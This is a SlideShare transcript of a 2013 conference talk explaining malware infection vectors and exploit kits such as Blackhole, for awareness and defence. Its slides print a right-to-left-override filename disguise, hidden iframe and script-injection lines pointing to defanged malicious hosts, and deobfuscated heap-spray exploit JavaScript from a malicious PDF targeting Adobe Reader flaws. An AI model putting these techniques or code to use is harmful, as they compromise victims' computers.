Dr. Strangelove or: How I Learned
to Stop Worrying and Love
Malware
Matthias Schmidt
Quid est Malware?
06/03/14 2Matthias Schmidt - Entwicklertag 2013
Viruses
Adware
Trojans
Worms
Ransomware
Rootkits
Spyware
Dialers
Keyloggers
Malware
06/03/14 3Matthias Schmidt - Entwickle...
Malware – why bother?
06/03/14 4Matthias Schmidt - Entwicklertag 2013
Personal Motivation
06/03/14 5Matthias Schmidt - Entwicklertag 2013
Although evil, Malware
is usually Art
06/03/14 6Matthias Schmidt - Entwicklertag 2013
Business Motivation
06/03/14 7Matthias Schmidt - Entwicklertag 2013
Source: McAfee Threats Report, Second Quarter 2012, McAfee Labs
06/03/14 8Matthias Schmidt - Entwicklertag 2013
Source: McAfee Threats Report, Second Quarter 2012, McAfee Labs
06/03/14 9Matthias Schmidt - Entwicklertag 2013
And for anybody else,
there is …
06/03/14 10Matthias Schmidt - Entwicklertag 2013
MasterCard
Latest AV Software $ 50
Update for 2 years $ 75
Loosing all your data Priceless
06/03/14 11Matthias Schmidt - E...
Infection - Classics
06/03/14 12Matthias Schmidt - Entwicklertag 2013
Email Attachment
06/03/14 13Matthias Schmidt - Entwicklertag 2013
Malicious URLs
06/03/14 14Matthias Schmidt - Entwicklertag 2013
Malicious Download
06/03/14 15Matthias Schmidt - Entwicklertag 2013
Infection –
Next Generation[TM]
06/03/14 16Matthias Schmidt - Entwicklertag 2013
Everybody loves
images, right?
06/03/14 17Matthias Schmidt - Entwicklertag 2013
U+202e anyone?
$ stat EmmaWatsonS<202e>gpj.exe
File: `EmmaWatsonSgpj.exe'
Size: 3 Blocks: 8 IO Block: 4096 regular file
De...
U+202e: Unicode Character 'RIGHT-
TO-LEFT OVERRIDE‘
HTML Entity &#x202e
Windows Alt + 202E
UTF-32 0x0000202E
C/C++/Java "u...
Drive by Download
06/03/14 20Matthias Schmidt - Entwicklertag 2013
<iframe
src="hxxp://tissot333.cn/eleonore/index.php"
width="0" height="0" frameborder="0">
</iframe>
06/03/14 21Matthias S...
Custom exploit
depending on the
victim’s environment
06/03/14 22Matthias Schmidt - Entwicklertag 2013
It’s no longer necessary
to click!
06/03/14 23Matthias Schmidt - Entwicklertag 2013
Java to the rescue
Source: Oracle JDK Security Vulnerabilities, CVE Details, 2013
06/03/14 24Matthias Schmidt - Entwickler...
Did I mention Flash?
Source: Adobe Flash Security Vulnerabilities, CVE Details, 2013
06/03/14 25Matthias Schmidt - Entwick...
Embedded Malware
06/03/14 26Matthias Schmidt - Entwicklertag 2013
Source: Microsoft MSDN
06/03/14 28Matthias Schmidt - Entwicklertag 2013
We learned from the macro
virus decade – right?
06/03/14 29Matthias Schmidt - Entwicklertag 2013
Unfortunately not
“One of the easiest and most powerful ways to
customize PDF files is by using JavaScript […]
JavaScript ...
What could possibly go
wrong?
06/03/14 31Matthias Schmidt - Entwicklertag 2013
Size: 12573 bytes
Version: 1.6
Binary: True
Linearized: False
Encrypted: False
Updates: 0
Objects: 9
Streams: 2
Comments: ...
Object 76
x='e';
arr='13@62@[...]@73';    // Very looong line
cc={q:'EVt;S.&<kgUAvi2pm*"IW5rxya7Gw6n/Q9lqM%{DPN[@d>-|
e43K...
→
if(e("1"))bjsg="%u8366%[…]%u0000";function ezvr(ra,qy){while(ra.length*2<qy)
{ra+=ra;}ra=ra.substring(0,qy/2);return ra;...
→
[…]
aPlugins = app.plugIns;
var sv = parseInt(app.viewerVersion.toString().charAt(0));
for (var i = 0; i < aPlugins.leng...
→
function printf() {
    nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
    var payload = unescape(bjsg);
    heapblock = no...
Automagical[TM]
Delivery
06/03/14 38Matthias Schmidt - Entwicklertag 2013
Linux/Cdorked.A
06/03/14 39Matthias Schmidt - Entwicklertag 2013
Random redirect –
once per day
per IP address
06/03/14 40Matthias Schmidt - Entwicklertag 2013
Features an IP address
blacklist and reacts according
to the victim’s Internet
browser’s language
06/03/14 41Matthias Schm...
Exploit Kits
Nice Pack
Cool EK Blackhole
Red Dot
Sweet Orange
Whitehole
Neutrino
06/03/14 42Matthias Schmidt - Entwicklert...
Lego bricks for evil
people
Features
• Graphical User Interface
• Bot management
• Fully encrypted communication
• Latest ...
Black Hole – Celebrity of
the Exploit Kits
06/03/14 44Matthias Schmidt - Entwicklertag 2013
Responsible for most web threats in
2012
First appeared on Russian
underground forums
Up to date licensing policy
Licenses...
Backhole - Infection
06/03/14 49Matthias Schmidt - Entwicklertag 2013
Victim receives a URL
06/03/14 50Matthias Schmidt - Entwicklertag 2013
Victim receives a URL –
and clicks on it
06/03/14 51Matthias Schmidt - Entwicklertag 2013
URL is redirected
through intermediate
sites
06/03/14 52Matthias Schmidt - Entwicklertag 2013
<script language=”JavaScript” type=”text/JavaScript”
src=”hxxp://www.grapevalleytours.com.au/ajaxam.js”>
</script>
<script...
Blackhole server at the
end of the chain
06/03/14 54Matthias Schmidt - Entwicklertag 2013
Format:
http://{server}/{mainfile}?
{threadid}={random hex digits}
Example:
hxxp://matocrossing.com/main.php?
page=206133a...
Server delivers custom
exploit code
06/03/14 56Matthias Schmidt - Entwicklertag 2013
06/03/14 57Matthias Schmidt - Entwicklertag 2013
Recommendations
Train/gain more
awareness
Remove/disable
browser plugins
Don’t forget the
worst case
06/03/14 58Matthias S...
Thank you!
06/03/14 Matthias Schmidt - Entwicklertag 2013 59
Q&A
Matthias Schmidt
@_xhr_
06/03/14 60Matthias Schmidt - Entwicklertag 2013
Upcoming SlideShare
Loading in...5
×

Dr. Strangelove or: How I Learned to Stop Worrying and Love Malware

74

Published on

My talk about Malware from the Entwicklertag 2013 in Karlsruhe.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
74
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
1
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Dr. Strangelove or: How I Learned to Stop Worrying and Love Malware

  1. 1. Dr. Strangelove or: How I Learned to Stop Worrying and Love Malware Matthias Schmidt
  2. 2. Quid est Malware? 06/03/14 2Matthias Schmidt - Entwicklertag 2013
  3. 3. Viruses Adware Trojans Worms Ransomware Rootkits Spyware Dialers Keyloggers Malware 06/03/14 3Matthias Schmidt - Entwicklertag 2013
  4. 4. Malware – why bother? 06/03/14 4Matthias Schmidt - Entwicklertag 2013
  5. 5. Personal Motivation 06/03/14 5Matthias Schmidt - Entwicklertag 2013
  6. 6. Although evil, Malware is usually Art 06/03/14 6Matthias Schmidt - Entwicklertag 2013
  7. 7. Business Motivation 06/03/14 7Matthias Schmidt - Entwicklertag 2013
  8. 8. Source: McAfee Threats Report, Second Quarter 2012, McAfee Labs 06/03/14 8Matthias Schmidt - Entwicklertag 2013
  9. 9. Source: McAfee Threats Report, Second Quarter 2012, McAfee Labs 06/03/14 9Matthias Schmidt - Entwicklertag 2013
  10. 10. And for anybody else, there is … 06/03/14 10Matthias Schmidt - Entwicklertag 2013
  11. 11. MasterCard Latest AV Software $ 50 Update for 2 years $ 75 Loosing all your data Priceless 06/03/14 11Matthias Schmidt - Entwicklertag 2013
  12. 12. Infection - Classics 06/03/14 12Matthias Schmidt - Entwicklertag 2013
  13. 13. Email Attachment 06/03/14 13Matthias Schmidt - Entwicklertag 2013
  14. 14. Malicious URLs 06/03/14 14Matthias Schmidt - Entwicklertag 2013
  15. 15. Malicious Download 06/03/14 15Matthias Schmidt - Entwicklertag 2013
  16. 16. Infection – Next Generation[TM] 06/03/14 16Matthias Schmidt - Entwicklertag 2013
  17. 17. Everybody loves images, right? 06/03/14 17Matthias Schmidt - Entwicklertag 2013
  18. 18. U+202e anyone? $ stat EmmaWatsonS<202e>gpj.exe File: `EmmaWatsonSgpj.exe' Size: 3 Blocks: 8 IO Block: 4096 regular file Device: 804h/2052d Inode: 9047185 Links: 1 Access: (0644/-rw-r--r--) Uid: ( 1000/m) Gid: ( 1000/m) […] 06/03/14 18Matthias Schmidt - Entwicklertag 2013
  19. 19. U+202e: Unicode Character 'RIGHT- TO-LEFT OVERRIDE‘ HTML Entity &#x202e Windows Alt + 202E UTF-32 0x0000202E C/C++/Java "u202E" Python u"u202E" 06/03/14 19Matthias Schmidt - Entwicklertag 2013
  20. 20. Drive by Download 06/03/14 20Matthias Schmidt - Entwicklertag 2013
  21. 21. <iframe src="hxxp://tissot333.cn/eleonore/index.php" width="0" height="0" frameborder="0"> </iframe> 06/03/14 21Matthias Schmidt - Entwicklertag 2013
  22. 22. Custom exploit depending on the victim’s environment 06/03/14 22Matthias Schmidt - Entwicklertag 2013
  23. 23. It’s no longer necessary to click! 06/03/14 23Matthias Schmidt - Entwicklertag 2013
  24. 24. Java to the rescue Source: Oracle JDK Security Vulnerabilities, CVE Details, 2013 06/03/14 24Matthias Schmidt - Entwicklertag 2013
  25. 25. Did I mention Flash? Source: Adobe Flash Security Vulnerabilities, CVE Details, 2013 06/03/14 25Matthias Schmidt - Entwicklertag 2013
  26. 26. Embedded Malware 06/03/14 26Matthias Schmidt - Entwicklertag 2013
  27. 27. Source: Microsoft MSDN 06/03/14 28Matthias Schmidt - Entwicklertag 2013
  28. 28. We learned from the macro virus decade – right? 06/03/14 29Matthias Schmidt - Entwicklertag 2013
  29. 29. Unfortunately not “One of the easiest and most powerful ways to customize PDF files is by using JavaScript […] JavaScript in Adobe Acrobat software implements objects, methods, and properties that enable you to manipulate PDF files, produce database-driven PDF files, modify the appearance of PDF files, and much more.” Source: https://www.adobe.com/devnet/acrobat/javascript.html 06/03/14 30Matthias Schmidt - Entwicklertag 2013
  30. 30. What could possibly go wrong? 06/03/14 31Matthias Schmidt - Entwicklertag 2013
  31. 31. Size: 12573 bytes Version: 1.6 Binary: True Linearized: False Encrypted: False Updates: 0 Objects: 9 Streams: 2 Comments: 0 Errors: 1 Version 0: Catalog: 21 Info: No Objects (9): [7, 21, 23, 24, 25, 26, 28, 60, 76] Streams (2): [26, 60] Encoded (2): [26, 60] Objects with JS code (1): [76] Suspicious elements: /AcroForm: [21] /Names: [21, 24] /JavaScript: [23, 25, 76] /JS: [25, 76] 06/03/14 32Matthias Schmidt - Entwicklertag 2013
  32. 32. Object 76 x='e'; arr='13@62@[...]@73';    // Very looong line cc={q:'EVt;S.&<kgUAvi2pm*"IW5rxya7Gw6n/Q9lqM%{DPN[@d>-| e43K]"h,zu+j18fo :(b)cs_=}C0'}.q; q=x+'v'+'al'; a=(Date+String).substr(2,3); aa=([].unshift+[].reverse).substr(2,3); if (aa==a){ t='3vtwe'; e=t['substr']; w=e(12)[q]; s=[]; ar=arr.split('@'); n=cc; for(i=0;i<ar.length;i++){ s[i]=n[ar[i]]; } if(a===aa)w(s.join('')); } 06/03/14 33Matthias Schmidt - Entwicklertag 2013
  33. 33. → if(e("1"))bjsg="%u8366%[…]%u0000";function ezvr(ra,qy){while(ra.length*2<qy) {ra+=ra;}ra=ra.substring(0,qy/2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw- 0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});} function printf() {nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A %u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray) {bigblock+=bigblock;} fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length- spray);while(block.length+spray<0x40000){block=block+block+fillblock;} mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} var num=1299999999999999999988[…]88;util.printf("%45000f",num);} function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c- 0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++) {arry[vqcQD96y]=yarsp+payload;} var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000) {tUMhNbGw+=tUMhNbGw;} tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}} if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)|| (sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a() {util.printd("p@111111111111111111111111 : yyyy111",new Date());}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=="EScript"){var i=h[f].version;}} if((i>8.12)&&(i<8.2)) {c=new Array();var d=unescape("%u9090%u9090");var e=unescape(bjsg);while(d.length<=0x8000) {d+=d;}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++) {c[f]=d+e;}a();a();try{this.media.newPlayer(null);}catch(e){}a();}} 06/03/14 34Matthias Schmidt - Entwicklertag 2013
  34. 34. → […] aPlugins = app.plugIns; var sv = parseInt(app.viewerVersion.toString().charAt(0)); for (var i = 0; i < aPlugins.length; i++) {     if (aPlugins[i].name == "EScript") {         var lv = aPlugins[i].version;     } } […] if ((lv == 9) || ((sv == 8) && (lv <= 8.12))) {     geticon(); } else if (lv == 7.1) {     printf(); } else if (((sv == 6) || (sv == 7)) && (lv < 7.11)) {     bx(); } else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) ||    (lv <= 8.17)) { […] 06/03/14 35Matthias Schmidt - Entwicklertag 2013
  35. 35. → function printf() {     nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");     var payload = unescape(bjsg);     heapblock = nop + payload;     bigblock = unescape("%u0A0A%u0A0A");     headersize = 20;     spray = headersize + heapblock.length;     while (bigblock.length < spray) {         bigblock += bigblock;     }     […]     util.printf("%45000f", num); } function geticon() {     var arry = new Array();     if (app.doc.Collab.getIcon) {         var payload = unescape(bjsg);         var yarsp = unescape("%u9090%u9090");         yarsp = ezvr(yarsp, qy);         var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;         […]         for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y++)             arry[vqcQD96y] = yarsp + payload; […] app.doc.Collab.getIcon(tUMhNbGw); } CVE-2008-2992 Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability CVE-2009-0927 Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution Vulnerability 06/03/14 36Matthias Schmidt - Entwicklertag 2013
  36. 36. Automagical[TM] Delivery 06/03/14 38Matthias Schmidt - Entwicklertag 2013
  37. 37. Linux/Cdorked.A 06/03/14 39Matthias Schmidt - Entwicklertag 2013
  38. 38. Random redirect – once per day per IP address 06/03/14 40Matthias Schmidt - Entwicklertag 2013
  39. 39. Features an IP address blacklist and reacts according to the victim’s Internet browser’s language 06/03/14 41Matthias Schmidt - Entwicklertag 2013
  40. 40. Exploit Kits Nice Pack Cool EK Blackhole Red Dot Sweet Orange Whitehole Neutrino 06/03/14 42Matthias Schmidt - Entwicklertag 2013
  41. 41. Lego bricks for evil people Features • Graphical User Interface • Bot management • Fully encrypted communication • Latest exploit updates • Infos about installed AV software • … 06/03/14 43Matthias Schmidt - Entwicklertag 2013
  42. 42. Black Hole – Celebrity of the Exploit Kits 06/03/14 44Matthias Schmidt - Entwicklertag 2013
  43. 43. Responsible for most web threats in 2012 First appeared on Russian underground forums Up to date licensing policy Licenses: • Annual license: $ 1500 • Half-year license: $ 1000 • 3-month license: $ 700 During the term of the license all the updates are free. Rent on our server: • 1 week (7 full days): $ 200 • 2 weeks (14 full days): $ 300 • 3 weeks (21 full day): $ 400 • 4 weeks (31 full day): $ 500 Source: Inside a Black Hole, Gabor Szappanos, Principal Researcher, SophosLabs 06/03/14 46Matthias Schmidt - Entwicklertag 2013
  44. 44. Backhole - Infection 06/03/14 49Matthias Schmidt - Entwicklertag 2013
  45. 45. Victim receives a URL 06/03/14 50Matthias Schmidt - Entwicklertag 2013
  46. 46. Victim receives a URL – and clicks on it 06/03/14 51Matthias Schmidt - Entwicklertag 2013
  47. 47. URL is redirected through intermediate sites 06/03/14 52Matthias Schmidt - Entwicklertag 2013
  48. 48. <script language=”JavaScript” type=”text/JavaScript” src=”hxxp://www.grapevalleytours.com.au/ajaxam.js”> </script> <script language=”JavaScript” type=”text/JavaScript” src=”hxxp://www.womenetcetera.com/ajaxam.js”> </script> <script language=”JavaScript” type=”text/JavaScript” src=”hxxp://levillagesaintpaul.com/ccounter.js”> </script> <script language=”JavaScript” type=”text/JavaScript” src=”hxxp://fasttrialpayments.com/kquery.js”> </script> 06/03/14 53Matthias Schmidt - Entwicklertag 2013
  49. 49. Blackhole server at the end of the chain 06/03/14 54Matthias Schmidt - Entwicklertag 2013
  50. 50. Format: http://{server}/{mainfile}? {threadid}={random hex digits} Example: hxxp://matocrossing.com/main.php? page=206133a43dda613f 06/03/14 55Matthias Schmidt - Entwicklertag 2013
  51. 51. Server delivers custom exploit code 06/03/14 56Matthias Schmidt - Entwicklertag 2013
  52. 52. 06/03/14 57Matthias Schmidt - Entwicklertag 2013
  53. 53. Recommendations Train/gain more awareness Remove/disable browser plugins Don’t forget the worst case 06/03/14 58Matthias Schmidt - Entwicklertag 2013
  54. 54. Thank you! 06/03/14 Matthias Schmidt - Entwicklertag 2013 59
  55. 55. Q&A Matthias Schmidt @_xhr_ 06/03/14 60Matthias Schmidt - Entwicklertag 2013
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×